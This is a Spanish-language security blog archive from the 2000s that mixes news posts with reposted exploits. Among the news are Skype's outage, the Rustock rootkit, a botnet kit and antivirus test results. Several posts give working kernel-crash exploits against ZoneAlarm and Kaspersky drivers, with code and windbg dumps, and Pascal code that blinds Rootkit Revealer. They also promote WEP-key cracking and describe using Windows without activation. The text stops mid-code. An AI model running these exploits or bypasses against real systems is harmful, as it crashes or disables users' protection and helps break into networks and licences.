Entradas etiquetadas con “seguridad” de Mixelandia

Hoy me tope con la noticia de que los productores de el Gran Hermano 9 (GH9) en España, han mandado una carta de "cese y desista", a una blogger o bloggera, la cual había hecho un blog, el cual trataba completamente sobre este reality show del GH9. El motivo de esta carta es muy sencillo, la blogger estaba robando imagenes, y contenido en video de los episodios de GH9, eliminando la parte de la publicidad que recordemos es la que mantiene vivos a los programas televisivos.
El contenido de la carta es muy directo, elimina todo el contenido sobre el cual tenemos derechos de copyright, o actuaresmos con todo el rigor de la ley un contra tuya.
Este tipo de acciones son muy conocidas, y suelen tener el efecto deseado, el cual es intimidar al plageador del contenido.
Ahora, resulta que hay gente que se solidarisa con esta blogger, y le expresa todo su apoyo, al decir que Zeppelin Televisión ( la productora de GH9) se debería de congratular del hecho de que en blogs y foros se hable de GH9, ya que esto le da más propaganda, a su programa. Sin embargo estos señores (bloggers) olvidan el hecho de que robar no es dar promoción gratuita, sino obtener un veneficio presonal con el trabajo de otros, y eso es ser un parasito.

Pues resulta que deje instalado el programa (img24.zip) del virus en mi maquina virtual, y hoy que la reviso me topo con la sorpresa de que estoy enviendo spam.. pro que lo digo, bueno basta ver las direcciones a las que se esta conectando el archivo temporal que descargo el virusito este que tanto hemod hablado. Desafortunadamente para cuando me dispuse ha hacer esta entrada, el envio masivo de emails desde mi maquina ya habia finalizado, sin embargo el tiempo que duro me permitio recolectar alguna infomación importate.

Lo primero es que el virus se conecta a un servidor, desde el cual recive ordenes, el cual es este 147.202.32.83:2756 obiamente no se trata de ninguna página web normal, ya que estas suelen estar en el puerto 80 o 8080, ahora veamos que  nos regresa esa dirección.

:link6.bitch.net 451 GET :
:link6.bitch.net 451 Host: :
:link6.bitch.net 451 User-Agent: :
:link6.bitch.net 451 Accept: :
:link6.bitch.net 451 Accept-Language: :
:link6.bitch.net 451 Accept-Encoding: :
:link6.bitch.net 451 Accept-Charset: :
:link6.bitch.net 451 Keep-Alive: :
:link6.bitch.net 451 Connection: :

Hace unos momentos estaba yo muy tranquilo chateando con un amigo, y de repente me aparece una conversación de una amiga la cual me manda el siguiente mensaje:

    Moquita Bonita     dice:
oye voy a agregar esa foto a mi blog ya
    Moquita Bonita     envía:

    IMG-0012.zip
 
    Abrir (Alt+P)
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
¿¿??¿?
 
  Has recibido satisfactoriamente C:\Documents and Settings\Administrador\Mis documentos\Mis archivos recibidos\IMG-0012.zip de     Moquita Bonita    .
 
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
y eso que es ???
ha ya se virus

Desde ya hace un buen rato hemos sido testigos de las icontables caidas que ha tenido el sitio ba-k.com, esto ha desatado algunas polemicas de que si es un vil vividor o que si es un delincuente. A decir verdad no meteria las manos al fuego por ba-k, pero vamos a tratar de decir lo que en estos momentos esta pasando en el servidor de ba-k.com.

Empecemos con el dominio, el cual es sin duda el link entre los usuarios y el servidor. Haciendo una pequeña busqueda descubrimos que el dominio esta pagado hasta el 18 de bril del 2009, por lo que ese no es el problema.

de hecho esta es la información completa de whois de ba-k.com


Registrant:
   Bakita Feliz
   Alpura 68
   Milkland, Mexico 546546
   Mexico

Este texto fue publicado por EP_X00F en los foros de sysinternals.

aqui

-- comienza traducción --

Hola

El troyano Rustock, acutalmente es uno de los malwares más avanzados tecnicamente. La uni ca parte que conforma esta troyano, se encuentra implementada en el modo kernel, así como su sistema de antidetección y su sistema de red.

Esta es una lista de las versiones disponibles de Rustocy y algunas de sus variantes (posiblemente no todas).


La mayoria de ellas fueron encontradas con la ayuda de herramientas HIDS gratuitas o con la ayuda de HIPS.


i386.sys
sysbus32.sys (2006)
wincom32.sys (2006?)

SSDT patching y IRP hooking

??windev.sys (2006?)

No hay información

pe386.sys (2006)


Hooking de la SYSCALL / ocultacion del driver.

mni41.sys (2006)*

*El driver puede tener un nombre aleatorio.

SSDT inline hooking, IRP hooking
Empaquetado con un protector polimórfico similar al de las versiones posteriores
Motor TCP/IP stack (firewalls sobrepasadas)
Eliminación de los competidores (ntio256.sys y runtime2.sys)

Como puede observarse, esta versión fue detectada apenas unos cuantos meses atras.


huy32.sys (2006)

Beta de Rustock.B
Contiene casi toda la funcionalidad de la versión principal

lzx32.sys (2006)

Actualmente es el rootkit de modo kernel mas avanzado que se a detectado
SYSCALL inline hooking
Utiliza ADS para ocultarse (diferentes variantes utilizan diferentes maneras para hacer esto)
motor TCP/IP stack  (firewalls sobrepasadas)
Sistema avanzado de antidetección (Contiene una lista negra de antirootkits - RKR, IceSword, DarkSpy, Blacklight, GMER)
Tanto el Dropper y el driver estan empaquetados con un protector avanzado.


Rustock.C (2006)
??Rustock.D (2007?)

Implementación en la parte profunda del kernel
Firewall y antivirus completamente sobrepasados
Autodefensa (DKOM y parcialmente DKOH)
Sistema Anti antirrotkits (los antirootkitys mas populares son sobrepasados)
Sistema Anti VM (las maquinas virtuales "VM" son detectadas y se evita la ejecución en estas)
Técnicas anti debugging
Empaquetador Polimórfico para drivers y droppers (unico, empaquetador + protector para drivers privado)

Para nosotros carece de todo sentido el proposito ("aspetos éticos" y otras mierdas ) con el que se haya desarrollado esta serie de troyanos y lo que este haciendo en la actualidad. Nosotros estamos interesados solamente en la propia tecnología de los rootkits, debido a que esta puede mejorar las habilidades de todos los antirootkits dessarrollados en estos momentos (RkU, gmer, IceSword).

Así que si alguine puede agragar algo más acerca de Rustock o alguno acerca de sus multiples variantes, estaremos muy felices de ello.

-- Termina traducción --

Saludos

Una compañia ha dejado ver que puede desbloquear los IPhones. Aun no han revelado el costo que esto tendra, pero si el hecho de que tendras licensias, por lo que cada licencia comprada sera un Iphone desbloquedo.

No hace mucho se habian liberado unas instrucciones para desbloquear los iphones de manera manual y con varios chips, el más grande inconveniente con este metodo era el tener que abrir tu iphone nuevo y meterle mano, lo que para muchas personas podria resultar fatal, ya que la mayoria de la gente no solemos soldar o instalar artilugios electronicos.
Hay rumores de que en México la compañia que traera el iphone sera Telcel, lo cual no es de extrañar si tomamos en cuenta que es propiedad del hombre más rico del mundo, el sr Carlos Slim.

Ya solo para terminar les dejo el enlace de esta página en la que podran comprar el software para desbloquear su futuro IPhone.

http://iphonesimfree.com/

Saludos.

Esta ha sido la versión oficial que ha publicado hoy Skype sobre lo ocurrido el 16 de Agosto

"El jueves 16 de Agosto del 2007, la red peer-to-peer de Skype se volvio inestable y sufrio una interrupción critica.
Esta interrupción se debio a la reinciada masiva de computadoras al rededor del mundo en un corto lapso de tiempo, puesto que se reiniciaron despues de recivir un grupo de parches via las Actualizaciones de Windows.

El alto numerode reinicios afecto los recursos de la red de Skype. Esto cuaso que el las peticiones de log-in inundaran la red, lo cual combinado con los pocos recursos de la red peer-to-peer, dieron com resultado una cadena de sucesos que llevaron a tener un impacto critico.

Normalmente la red peer-to-peer de Skype tiene la hablilidad de auto-recuaperarse, sin embargo, este evento revelo un bug en el software el cual no habia sido visto, el cual es referente a el algorirmo de asignacion de recurso de red, el cual impidio que la función de auto-recuperación trabajara de una froma rápida. Desafortunadamente, como resultado de este hecho, Skype no estubo disponible para la mayoria de los usuarios por casi dos dias.

Este hecho ya ha sido idententificado en Skype. Así que podemos confirmar de una manera categorica que no se trato de ninguna actividad maliciosa como fue especulado y por lo tanto la seguridad de nuestros usuarios nunca estubo en risgo en ningun momento.

Esta interrupción no ha tenido precedentes en el impacto y el alcance. Nos gustaria puntualizar que muy pocas tecnologias o redes de comunicación en  la actualidad garantizan una operación sin interrupciones.

Estamos muy orgullosos de que durante estos 4 años de operaciónm Skype ha brindado un herramienta de comunicacion muy fuerte a millones de personas al rededor del mundo. Skype ha identificado y agregado un número de mejoras a su programa para asegurar que sus usuarios no se vean nuevamente afectados en la remoda posibilidad de que esta combinación de eventos volviera a ocurrir.

La comunidad de usuarios de Skype nos a apoyado increiblemente y estamos muy agradecidos por todos sus buenos comentarios y agradecimientos."

Esta es una traducción no oficial de la entrada What happened on August 16 que aparecio en el blog oficial de Skype el dia de hoy.

Saludos

Navegando por haí me topé con este pequeño código de html, el cual puede llegar a tronar internet explorer 6, este bug se produce debido a que IE6 no puede manejar correctamente el código malformado que se muestra a continuación:
Al parecer el error se genera en mshtml.dll, que por el nombre parecer ser la encargada del parseo del html.

Si te sientes muy confiado o queieres poner a prueba tu navegador (Firefox esta libre de tal fallo), aqui esta una página la cual explota la vulnerabilidad.
Algo que tenemos que tomar en cuenta es que esta vulnerabilidad no parece ejecutar codigo malicioso.

Saludos y ya no usen el IE6 es rechafa...

Despues de que por casi dos dias el servicio de login de Skype estubiera caido, por consiguiente los usuarios no podian utilizarlo, se anuncia que por fin el hecho ha sido resuelto que la mayoria de la gente puede disfrutar de el servicio de skype otra vez.

En el transcurso de esta caida de Skype, se especulaba que podia se debido a fallas de los servidores o se llego a decir que se trataba de un ataque de hacking.

Alo anterior gente de Skype respondio que se trataba de un error en el algoritmo de login, es decir que metieron las patas en la ultima version del skype. Lo que no queda claro es si el problema del algoritmo fue en los clientes o en el servidor.

Esperemos que este tipo de hechos no se vuelvan a repetir puesto que hay mnuchos intereses de por medio.

Saludos

Expertos en seguridad han dejado al descubierto una vulnerabilidad 0-day en la ultima versión de Firefox, la cual provee control total sobre computadoras con el sistema operativo Windows, cuando se visita un sitio "booby-trapped" con el navegador de Mozilla.

La vulnerabilidad consiste en la forma en que Firefox maneja los identificadores uniformes de recursos o URI (uniform resource identifiers) , que es el protocolo que permite al navegador accesar a diferentes programas y otros recursos localizados en la PC. El fallo se produce cuando el navegador es incapaz de procesar correctamente al menos 5 URI diferentes.

durante los últimos meses las URI's han surgido como uno de los eslabones mas débiles en la cadena de seguridad. La semana pasada Mozilla libero un parche critico para Firefox, relacionado con el manejo de URI's. Por otro lado Internet Explorer y Trillian Instant Messenger también fueron victimas de este fallo.

el problema es resultado de la poca documentación que existe de los incontables URI's que son agregados por aplicaciones de terceros al registro de Windows. Los navegadores normalmente no están bien preparados para confrontar de una forma correcta los diferentes exploits de seguridad que surgen de estos URI's, aun y cuando estos son de aplicaciones relacionadas entre si.

Hay que tomar en cuenta que con cada URI que se registra, la posibilidad de que se lleve a cabo un ataque exitoso contra la máquina,esta umenta.

"Esta es una especie de super tormenta en la ue los navegadores no están haciendo correctamente su trabajo, en términos de limpiar las URI's y las aplicaciones que registran esas URI's no son capaces de manejar correctamente los parámetros que están siendo pasados a este por el navegador"

Un vocero de la organización open-source comento que el equipo de seguridad de Mozilla esta es al tanto de este hecho y ya se encuentran generando el parche correspondiente.

La otra vez hice una entrada acerca del aircrack-ptw, el cual te puede desencritar las claves wep de 128 bit en uno o dos minutos, y algunas personas me dijeron que estaba muy técnico, que no le entendieron, pues ahora les dejo un vídeo de como se utiliza este programita, esta en backtrack y desencripta la wep en un minuto.

aquí el link del aircrack-ptw en acción


Este vídeo es muy demostrativo y no debería de generar mucha confusión, más si alguien aun no le entiende bien me dice para tratar de hacer uno yo desde ceros.

Nunca les ha pasado que llegan a un lugar donde la red es inalámbrica y ustedes traen su laptop y no se pueden conectar debido a que esta protegida por wap o wep. Bien a mi me han tocado algunos casos por el estilo y el problema se acentúa cuando nadie se sabe la clave, es decir tenemos maquinas que están conectadas pero nadie se sabe la calve wep o wap.

Para esos casos hay una herramienta que nos permite ver las claves wep y wap que están almacenadas en una computadora, pero solamente las que guarda por medio de la pantalla de configuración de wl propio windows es decir no funciona si tienes instalado algún otro software que se encargue de gestionar las conexiones inalámbricas.

Este programa se llama WirelessKeyView y en su página aweb dice lo siguiente:

"WirelessKeyView permite reuperar todas las claves de red inalámbrica WEP o WAP que se encuentran almacenadas en tu computadora, guardadas por el servicio de configuración de redes inalámbricas de Windows xp y por el sevicio de Auto configuración de Windows Vista. Esto te permite recuperar de una manera fácil todas tus claves en archivos de texto, html o xml o copiar una clave al porta papeles de windows."



El programa no requiere de ningún tipo de instalación o DLL's adicionales, simplemente extrae el ejecutable en cualquier capeta y ejecutalo. Cuando el programa este corriendo, te debería de mostrar las claves almacenadas en tu computadora.

Otra caracteristica es que te puedes descargar un archivo que sirve para traducir al español la aplicación.

Aqui se las dejo epero ue les sirva tanto como a mi

Descargar

Descargar la traducción (nota requieres bajar tambien el otro archivo)

La buena Natalia hizo el favor de enviar un correo con importante informacion del secuestro de moda...

ATENCIÓN NO APAGUEN SU CELULAR

(SUENA JALADO PERO PUEDE PASAR!!!))
ATENCIÓN NO APAGUE SU CELULAR

Ya esta demasiado conocida la extorsión telefónica según la cual:

Alguien llama diciendo que había secuestrado un pariente y para regresarlo a casa hay que pagar una suma en efectivo.
Pues esto acaba de ser remodelado, actualizado, ya que la prensa anduvo divulgando como reaccionar ante ello.

Ahora los bandidos están llamando a los celulares anunciando que fue detectado un clon del aparato:

Así dicen:

- Hola, somos de (Telcel, Iusacel, Movistar, Unefon ... )
- Lamentablemente le informamos que su celular fue clonado.
- Por eso le suplicamos apagar su celular por una hora.

Los que reciben ese telefonema apagan su celular creyendo en el excelente servicio de la concesionaria del servicio telefónico.

En la siguiente hora los bandidos se dedican a extorsionar a la familia de la persona llamada. Telefonean a la casa y practican la extorsión del secuestro.

Quien recibe la llamada en la casa inmediatamente corre a llamar al celular de la persona supuestamente secuestrada y escucha el mensaje:

- "Lo sentimos, el numero que Ud. llamo se encuentra apagado o fuera del área de cobertura del servicio, llama mas tarde, por favor.

De ahí en adelante toda familia entra en pánico total.

agregado: listado y desganchado de Shadow SSDT
agregado: nuevo dialogo de acerca ;)
el sistema de actualización es ahora completamente configurable.
remivido: el banneo a GMER y el banneo a los debuggers de modo kernel

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.


Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

Los hackers han desarrollado una nueva forma de engañar alos usuarios y que descarguen malware desde un sitio de descarga apocrifo de Adobe Shockwave Player.

la forma en que operan estos sitios es mostrando iconos especialmente formados, para hacer creer al usuario que su copia de Shockwave (si es que se encuentra instalado) no esta funcionando correctamente.

Todos los links apuntan a otro sitio el cual da un "diagnostico del problema", hay que actualizar el macromedia flash player. El usuario es redirigido a un sitio que se hacer pasar por el Centro de descarga del hockwave Player.

Por supuesto la descarga es un troyano, en vez del popular Flash player. Entre las características del sitio podemos encontrar que deshabilita el botón derecho del mouse.

Con la utilización de ingeniería social, en vez de utilizar permanentemente vulnerabilidades, tales como el iFrame en internet explorer, los hackers extienden los rangos de sus posibles víctimas.

Como la ven apoco no se ve bien nice esta imagen en un cajero automatico. Yo me pregunto si algo como esto inspiraria confianza al momento de realizar una operación bancaria.

Pero bueno el otro dia descubri como utilizar una computadora sin activar, jeje con la ayuda del buen internet explorer y un poco de imaginación se puede lanzar el shell (exploerer.exe) y listo a usar la compu sin que este activada, nomas que silencio no le digan a nadie que yo les dije.

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

Por casualidad me tope con este video de trinity hackeando la red electrica de la matrix. En este video se puede observar que usa el sshnuke y que esta dentro de una red privada del tipo 10.0.0.0 lo que nos da un total de 16777216 computadoras. o cual es un desperdicio jaja son muchas maquinas para las pocas que se usan realmente.
pero en fin... esta chido...

Programas antivirus de varias compañías de nivel mundial han fallado en la mayor prueba de malware la VB100

Los productos de Kaspersky, Grisoft, y F-Secure han fallado en detectar el 100% del malware que se encuentran en la base de datos de Virus Bulletin, anqué en alguna ocasión ya habían pasado esta prueba.

De los 37 productos probados, 10 fallaron al momento de demostrar sus habilidades de detección necesitarías para obtener la certificación VB100.

Kaspersky Anti-Virus 6.0.2.621 fallo en detectar el gusano de internet llamado allaple. De acuerdo con el consultor de tecnología de Kaspersky, David Emm, Kaspersky había agregado la firma para el gusano en Febrero. Sin embargo al momento de la prueba, Kaspersky se encontraba "optimizando" la firma del allape, y la firma no se encontraba en la base de datos de Kaspersky.

Grisoft AVG 7.5 professional Edition también fallo en el VB100. AVG es una aplicación antimalware gratuita muy conocida, que tiene una gran aceptación.

Larry Bridwellm el estratega general de seguridad de Grisoft, dijo que la parte de este anti-malware, AVG 7.5 Professional Edition, que detecta firmas ha fallado al detectar una de las variantes del Troyano Agobot, pero que la parte anti-spyware del producto lo había detectado. "Las pruebas son al momento de accesar los archivos a nivel hardware" comento Bridwell. Cuando se probo el AVG 7.5 Professional Edition, encontramso el bot en la parte del anty spyware, la cual es sobre demanda [el programa tiene que iniciarse de forma manual]. Deberíamos de haber detectado el malware al momento del acceso.

Al igual que Kaspersky el servicio de protección para clientes de F-Secure (7.00 buil 387) fallo al detectar el Allaple. La compañía dijo que había cometido un error al no enviar las últimas actualizaciones de su base de datos. "El producto enviado a la prueba no incluía las ultimas actualizaciones", comentó F-Secure. "El programa que probado off line, lo cual no permitió al programa actualizarse a la ultima versión en la base de datos. En el ambiente del usuario normal la base de datos se hubiera actualizado de manera automática.

Todas estas pruebas fueron realizadas en Windows XP.

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquí
nota:
Solamente usenlo si realmnente saben lo que hacen...

Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel.

Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto.

Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando.

El objetivo principal del exploit es usar restricciones del sistema de archivos que también están presentes en RKR. El exploit crea un árbol de 1024 directorios es decir cada uno esta dentro del anterior, y después copia calc.exe (la calculadora de windows) en el último directorio creado con el nombre “test.exe”. Después de crear este exploit cualquier escaneada al disco con RKR será completamente inútil, porque cuando RKR pase por el directorio del exploit este comenzara a mostrar todo los directorios y archivos como "Visible in Windows API, MFT, but not in directory index".

Usando este exploit con las viejas versiones de consolas genera un error de violación de acceso.

El codigo del exploit se muestra a continuación…

Advertencia:

Debido a las raices del Sitema de Archivos y a las restricciones de la Ínterfaz Grafica de Windows no es sencillo eliminar el exploit del disco. Así que no lo uses en una maquina real si no sabes como eliminar el archivo.

var

 i: integer;

 buf: array[0..100000] of wchar;

 buf2: LBuf;

begin

 memzero(@buf, sizeof(buf));

 GetWindowsDirectoryW(buf2, MAX_PATH);

 strcpyW(buf, '\\?\C:\adir');

 CreateDirectoryW(buf, nil);

 for i := 0 to 1023 do

 begin

   strcatW(buf, '\adir');

   CreateDirectoryW(buf, nil);

 end;

 strcatW(buf, '\test.exe');

 strcatW(buf2, '\calc.exe');

 CopyFileW(buf2, buf, false);

end;

Este no es un exploit “puro” debido a que no genera escalación de privilegios. Este se puede clasificar como uno del tipo DoS (Denegación del Servicio).

Para corregir esta vulnerabilidad es necesario modificar RKR para soportar rutas UNC.

Bueno, ayer me entere de que hubo disturbios en la via publica por parte de alumnos de diferentes escuelas, principalmente prepas (cbtis 89, de cuya fuente obtuve la informacion). Todo esto ocurrio frente al Instituto Tecnologico de Durango... y bueno, la historia comienza asi.....
En la mañana de el dia 8 de junio de 2007 los policias judiciales agarran a 2 estudiantes con la excusa de que cargaban droga, sin mas ni mas comienzan a golpearlos, para despues registrarlos y darse cuenta de que no traian nada de alcaloides, pero el mal estaba hecho (para su desgracia)...
Poco despues los alumnos del tecnologico comenzaron a secuestrar patrullas y otros vehiculos de servicio publico a manera de queja contra los sucesos acontecidos ese mismo dia, pero creo que las cosas se salieron de control cuando comenzaron a salir los alumnos de las prepas, ya que las cosas se salieron completamente de control, habia "estudiantes" saltando y gritando en el camellon del blvd Felipe Pescador, voltearon una de las patrullas que tenian secuestradas, abollaron un camion de basura que iba pasando, entre otras cosas, para no hacerselas mas de emocion, les dejo las pruebas videograbadas para que no digan que estoy inventando.....
Y como ultimo comentario, solo creo (a manera muy personal) que esta no es la forma de reclamar algo, esta bien que queramos ser escujados y exigir justicia, existen otras formas de lograrlo y creo que sin haber volcado la patrulla y abollado los camiones lo hubieran logrado de una buena manera... ese es mi comentario





[en un rato mas pongo el otro video que falta]

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
